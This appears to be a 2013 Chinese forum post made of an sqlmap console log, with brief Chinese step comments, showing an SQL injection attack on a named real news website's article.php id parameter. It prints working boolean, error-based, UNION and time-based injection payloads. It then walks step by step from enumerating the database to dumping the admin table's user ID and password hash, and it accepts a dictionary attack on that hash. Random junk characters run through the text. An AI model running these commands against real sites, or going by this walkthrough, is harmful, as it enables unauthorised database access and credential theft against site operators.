D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
6 {2 W% V: W; Y: D# Q6 ims "Mysql" --current-user /* 注解:获取当前用户名称
: ~9 J: @1 B$ |; | sqlmap/0.9 - automatic SQL injection and database takeover tool
3 Z4 _9 z- Z2 M1 r, w+ D http://sqlmap.sourceforge.net starting at: 16:53:54% g9 C$ T2 f C0 I* T9 W7 _
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
$ d& U% Q! e2 I% p6 W6 B0 ?# E session file
2 Z6 @9 q: V+ ?. t- p) a' I, R" E[16:53:54] [INFO] resuming injection data from session file$ F( c9 t+ H z6 \/ G2 }* R/ g
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file- @5 a \& F9 T8 S
[16:53:54] [INFO] testing connection to the target url
/ o0 k6 ?+ ~. csqlmap identified the following injection points with a total of 0 HTTP(s) reque
, c8 o. d) u" }/ s w& u2 lsts:% }) ?4 l6 c" f! t1 n5 B7 ?, A6 i5 k# H
---2 E- ]- Q" h7 P( n9 m) K
Place: GET
* Y' s |- J l# b. @4 D- j; g% B$ oParameter: id
$ ^6 w# y" p# ~& j2 W' s+ w( S Type: boolean-based blind
2 \ u2 u2 x+ @2 q& R7 J7 v Title: AND boolean-based blind - WHERE or HAVING clause
4 l' _3 |/ X# R- o( z, u$ n Payload: id=276 AND 799=799
" N/ p2 ]6 T. z8 o v' v" G& Z6 J) A Type: error-based
4 K( h, }5 X8 l! A- V/ i6 X Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
* Z1 Y* r$ h) m" R' p. U% u Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 z$ G$ E7 B8 Y3 w9 G$ u
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* G1 `8 A0 X- @/ e$ W+ J! C
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), J! R) }4 f1 D$ V4 b
Type: UNION query
# l& f5 h: u P' I Title: MySQL UNION query (NULL) - 1 to 10 columns
2 Y& y% Z! P3 ~$ ^8 X Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, A. j- k, X a' O% ~
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 u: T. h' J" \+ e% _) V
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& g% s& q, \0 m: P) S Type: AND/OR time-based blind
( }) D2 H0 Q8 ?. C: [1 J Title: MySQL > 5.0.11 AND time-based blind2 S% r6 v1 T p
Payload: id=276 AND SLEEP(5)
1 Z* y" a2 c- E0 l% v( p7 `6 i---0 [6 m, Q! B& i1 m- Z; T
[16:53:55] [INFO] the back-end DBMS is MySQL, V4 Z6 Q! L+ v7 I: p) N
web server operating system: Windows' X/ \; U0 O1 y! [
web application technology: Apache 2.2.11, PHP 5.3.0
7 ?' v$ L% O) v! F; dback-end DBMS: MySQL 5.0
0 \/ k. P9 x, N' j; |[16:53:55] [INFO] fetching current user7 T# {" G W8 h& x/ m
current user: 'root@localhost'
" c( V2 e- @ d& U8 _1 Z6 ]$ I[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou: a: i" H3 g% n7 g }
tput\www.wepost.com.hk' shutting down at: 16:53:58
. P9 h% o6 @' \" G( T2 f2 L- f: s, b& u# C
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. K! b) a7 U# j V, k. V3 @0 Dms "Mysql" --current-db /*当前数据库
- ?: i+ d* y3 n2 P sqlmap/0.9 - automatic SQL injection and database takeover tool* |) G, q8 T+ u# x, s/ y+ u8 X0 E
http://sqlmap.sourceforge.net starting at: 16:54:162 _& H* g, V# N5 X: i* w
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 H% Y+ L, C! J
session file1 m( g2 O, F$ f+ F
[16:54:16] [INFO] resuming injection data from session file2 f) U" B9 C3 ]1 Z* T
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 G7 n" L2 q# {
[16:54:16] [INFO] testing connection to the target url
- s8 v1 b9 w5 j2 D$ F& usqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 |+ L4 Z# V1 z9 H6 v; Vsts:$ q; a/ `; x9 V3 N: y; C
---
, y# ]. Y3 |2 |Place: GET5 C- @6 s8 X1 _5 o
Parameter: id
4 ]2 U ?7 ?1 B( S Type: boolean-based blind
' j; j( n4 ~9 O k3 u& \% M Title: AND boolean-based blind - WHERE or HAVING clause
, ~4 _% S! V) R' [ Payload: id=276 AND 799=799
; k5 H) V/ h2 W2 q& l Y* T+ Z' M Type: error-based' U5 p: f: x( Q2 t& l( H$ {
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 A# m D! R- r" ~ T/ J3 o
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ N( G! a: P. _( j9 ]
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ n0 {/ \% h, E/ Q5 _/ H! l
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& m- p+ l) o9 o- i1 ^* A: U
Type: UNION query" g, u( n# U4 Q0 e
Title: MySQL UNION query (NULL) - 1 to 10 columns
# a. G: g$ a- K O" w Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 h6 k ?+ l! P% I
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
2 F7 [7 E) g. c( j. N; eCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; o4 s& _$ I, a {3 Q' \ Type: AND/OR time-based blind# h; L3 x' Z0 s9 H7 A6 a+ L
Title: MySQL > 5.0.11 AND time-based blind/ M& Q V3 @, n; ^3 Z* y
Payload: id=276 AND SLEEP(5)5 d9 k# ]8 p5 C+ [8 E; ~
--- T" ?% U% S) M6 ^
[16:54:17] [INFO] the back-end DBMS is MySQL& K& G8 E8 N( ]* y
web server operating system: Windows
1 c- Z6 d& G3 a8 \ Y& E, U$ mweb application technology: Apache 2.2.11, PHP 5.3.0
' _# a2 I" N6 D) b; G' mback-end DBMS: MySQL 5.0
% ~* b0 ^! W3 `, y" F( k[16:54:17] [INFO] fetching current database9 I% s8 P1 t; M2 D1 ?/ B& S
current database: 'wepost'' D* b+ S& t' h7 s
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou r" v6 @- v; N' x" C
tput\www.wepost.com.hk' shutting down at: 16:54:18
/ T, Y( U& N' }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 o# v; Z! ]9 e1 P" x* ]8 nms "Mysql" --tables -D "wepost" /*获取当前数据库的表名2 ]9 { m8 |; A1 h6 i* T
sqlmap/0.9 - automatic SQL injection and database takeover tool
4 G# q# P* K/ h) R# W http://sqlmap.sourceforge.net starting at: 16:55:25 C2 B/ i( U$ [
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
, f8 Z4 k, T7 `1 e! W4 a$ q session file% M% k0 R( l% D* m5 z& D
[16:55:25] [INFO] resuming injection data from session file# }3 O7 B! e9 ]& I# E) M8 y$ z+ ]
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. N* q8 S& L' P$ A) m# m. }- w% C
[16:55:25] [INFO] testing connection to the target url
$ E3 i$ X+ @- ^! a0 ^% tsqlmap identified the following injection points with a total of 0 HTTP(s) reque4 C Z7 Q1 @$ l* R! T+ \' V
sts:
; {& W* D- V, |& |---
1 z r, S, T) mPlace: GET/ q9 b, w6 _ f2 U8 L
Parameter: id
+ o1 i6 A1 E& B% Q$ E1 J' B9 K( r Type: boolean-based blind
' {* @9 c _+ {6 v) X3 D/ Z& S Title: AND boolean-based blind - WHERE or HAVING clause
9 [+ |2 F& z8 \8 d1 b* z$ |* q% K Payload: id=276 AND 799=799. ^7 Z9 C4 e1 U- K* O
Type: error-based Y2 ]8 e8 P, d( y& z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ M1 R* [8 Z4 \# k. s
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& K/ d1 K# L e) i5 j. a+ p0 R; ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. G+ S" O9 V3 o: s4 ^9 l1 r),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 E2 W! H$ [6 H9 O
Type: UNION query+ q. Y! Z2 _! t# E7 z
Title: MySQL UNION query (NULL) - 1 to 10 columns( D( y1 Y& u; D! v1 `9 S
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! K9 u) q; r( l(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ J& O: R9 x" e t
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 x$ U7 h/ s8 A2 X4 O Type: AND/OR time-based blind
9 A1 r( h( ^( a o. q) j8 p; Z- {$ t Title: MySQL > 5.0.11 AND time-based blind
- }& g! H: G9 O2 p/ w+ b* X1 K Payload: id=276 AND SLEEP(5)& \0 N( y- f& D- C8 @7 a% C
---. R* M' [! Q7 T
[16:55:26] [INFO] the back-end DBMS is MySQL
7 z, c! I6 l0 ^2 ^9 u7 ~web server operating system: Windows( e! v! _& Q& C3 H7 M. Q( X$ ?- r1 {2 d
web application technology: Apache 2.2.11, PHP 5.3.0" E$ e& i; a6 {8 e# f
back-end DBMS: MySQL 5.0
3 U8 h2 ^$ r' o( _[16:55:26] [INFO] fetching tables for database 'wepost'4 Z( ~4 y0 q" O6 r# j/ a
[16:55:27] [INFO] the SQL query used returns 6 entries1 {9 ~) T3 J m$ ?+ j, p0 b
Database: wepost
* v& Q# {+ ]$ z, n; q& t[6 tables]
( ]/ I+ K. E, ]: @! B, s2 ^$ k; ~+-------------+$ }2 B5 [9 o! \7 F) p0 i
| admin | U' @ w, l' ~
| article |# \( c/ N m4 t$ j4 o- x) H
| contributor |9 e2 o8 \+ N: K. J$ f8 I
| idea |1 c5 f" ^- `! ^! d' @& x
| image |
( x4 u7 O3 V; I" \) g; i| issue |
, P: \( V1 l" R9 f. @5 V# u+-------------+
) w: k* R. h; F5 ^[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou& c- _- D2 \4 y1 r7 w
tput\www.wepost.com.hk' shutting down at: 16:55:330 J4 B9 d' R, ^
, E8 I7 F. o; f) c/ [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
6 u( C: S1 A T2 \" e- vms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
; D v; z3 m7 p( \% I, u sqlmap/0.9 - automatic SQL injection and database takeover tool7 @( B' D5 N# i% R o
http://sqlmap.sourceforge.net starting at: 16:56:06
# G8 r# K* c% O a& osqlmap identified the following injection points with a total of 0 HTTP(s) reque
2 c4 g* [ h* q" L) hsts:7 y' b4 y/ W2 }1 o( U! r
---
5 p" c# I9 |' N( B' nPlace: GET. z2 x6 d0 Q2 q1 M- I
Parameter: id
8 n3 K# W, ~% \0 X Type: boolean-based blind
' |9 ~! d- i& m9 Q Title: AND boolean-based blind - WHERE or HAVING clause0 w3 W+ }8 d# ?/ O
Payload: id=276 AND 799=799
2 D( a7 V' r: V1 f: C5 e% r2 k Type: error-based
9 J! O( O- M. | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' ?) V# ?. v7 l# u& ~4 L
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
+ {2 W/ f6 i& X7 m; ~8 Y1 y( O120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 V4 X g+ @- e% i
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ b+ X9 ]8 Z8 s" }7 C
Type: UNION query
5 ]" \# f7 |9 M+ H: e Title: MySQL UNION query (NULL) - 1 to 10 columns
7 ]/ Q: `$ Z' G" Q r3 M1 d Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ ~! X! F% V* O. k0 x8 Z
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
6 L! f# u1 Y: U5 CCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 P+ ?6 b) \; i* w k8 w4 ]
Type: AND/OR time-based blind, _- q# C' v1 z s
Title: MySQL > 5.0.11 AND time-based blind
5 G9 N( Q; S' b; ?3 u Payload: id=276 AND SLEEP(5)$ A% p0 j# z- y0 _, O7 T! c8 u$ L
---
! _7 j5 ?8 d2 c& H# T4 S) r6 sweb server operating system: Windows" {; r9 V+ o% \9 m2 g8 X2 P! C" r/ h
web application technology: Apache 2.2.11, PHP 5.3.0" a8 k: r; s, y- X
back-end DBMS: MySQL 5.0* t y- F- {4 y1 |
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se Y' m, E, ?# H5 F# @% I; I
ssion': wepost, wepost4 }5 o$ @- W7 ^
Database: wepost
V( }+ {; c2 V/ K `4 P3 rTable: admin" z1 A/ f0 K# G+ F0 Y5 c* ^
[4 columns]
5 H6 X. P$ B8 u( Q' b, e+----------+-------------+
# R8 L8 a! v% k| Column | Type |6 @ h6 ^4 f) }
+----------+-------------+7 M7 l! C6 g2 w$ _) ]$ e
| id | int(11) |: `7 R/ W! H0 U. F& Y# l# {
| password | varchar(32) |
- ]8 v+ d$ W7 ?9 b1 \| type | varchar(10) |3 x( N: i0 s: g: V5 V6 I' u* z
| userid | varchar(20) |+ _7 F1 m- |3 Z/ u, Q
+----------+-------------+ [' C: m$ z* O) u1 }# B
shutting down at: 16:56:19' O, |" l& c u. S8 E# F: H
) F0 F+ Q$ R# \9 u- N/ L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
4 f( d6 o% f+ B( sms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
- a5 K. o- U ?, B8 A' D sqlmap/0.9 - automatic SQL injection and database takeover tool1 o; |2 v# M, _% U2 g
http://sqlmap.sourceforge.net starting at: 16:57:14/ A7 N* { J* t4 S
sqlmap identified the following injection points with a total of 0 HTTP(s) reque& r9 G) c: B) I, L+ ?
sts:
( `% y) @6 Q. d, P---
- p2 s9 W% O0 ~1 ePlace: GET
+ u6 P& ]2 G& H: C3 u8 v% y+ dParameter: id
$ ]# v8 Z# H; a8 U7 @. `) ?* m( r Type: boolean-based blind
% r% f% d* m/ h( l4 M- i# C9 L Title: AND boolean-based blind - WHERE or HAVING clause3 M' q, b0 z2 m4 B
Payload: id=276 AND 799=7997 B j2 E" ^: {) @3 x
Type: error-based. s1 a& K1 E5 ]6 a1 E R% J# [
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 J5 H+ [+ W% ~ v8 [/ G0 S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& E5 a: W2 g0 |1 C
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; y0 v9 Y, ^, `; v' F) F' {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" C- n; \7 }5 U: v& t/ a
Type: UNION query
/ k& }( i9 l. P: B& E Title: MySQL UNION query (NULL) - 1 to 10 columns
8 W8 h) ?! g' J3 O Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# N+ Y6 o; Q3 Z$ }$ p* ?0 x
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 ^" D- F& c- F
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#3 V8 l, }8 C. s2 Q# U* J% H
Type: AND/OR time-based blind
/ K7 G; f% F2 [- p9 e* [* A Title: MySQL > 5.0.11 AND time-based blind
4 \- F5 f; L6 u. ]1 \1 Z; g1 _ Payload: id=276 AND SLEEP(5)
7 G V- {- K% B s' U) p---! f+ U$ p% Z3 K8 a
web server operating system: Windows' P0 {0 u0 V l
web application technology: Apache 2.2.11, PHP 5.3.0% c" Z- l" m. ?6 O& W
back-end DBMS: MySQL 5.00 g9 {7 l) F% a5 V
recognized possible password hash values. do you want to use dictionary attack o# c1 G0 c g1 }8 @) R
n retrieved table items? [Y/n/q] y
/ ]) ?4 F0 v6 B( a/ a) ywhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
4 b5 H+ Q4 X/ B, x& x+ I5 z: pdo you want to use common password suffixes? (slow!) [y/N] y* e- ]) o( ]8 l7 I& _5 f
Database: wepost
' W3 Y: ?1 i3 M% hTable: admin: a. a. I! u L9 z+ j
[1 entry]
. L0 r% C; r4 z. `+----------------------------------+------------+
3 Q' M: A7 T" R1 Z( Q& E0 \' b: N% G| password | userid |
5 g& M- u8 O1 a% \4 W+----------------------------------+------------+
! F V2 v/ f6 e9 q3 y6 l| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |! |0 z b! w! b) K5 T
+----------------------------------+------------+$ W1 K- g7 p* }0 |+ R; d# i; B+ |
shutting down at: 16:58:141 j% p5 V# f8 w
( o& @1 `# f. `! C6 t: |& o: U6 KD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对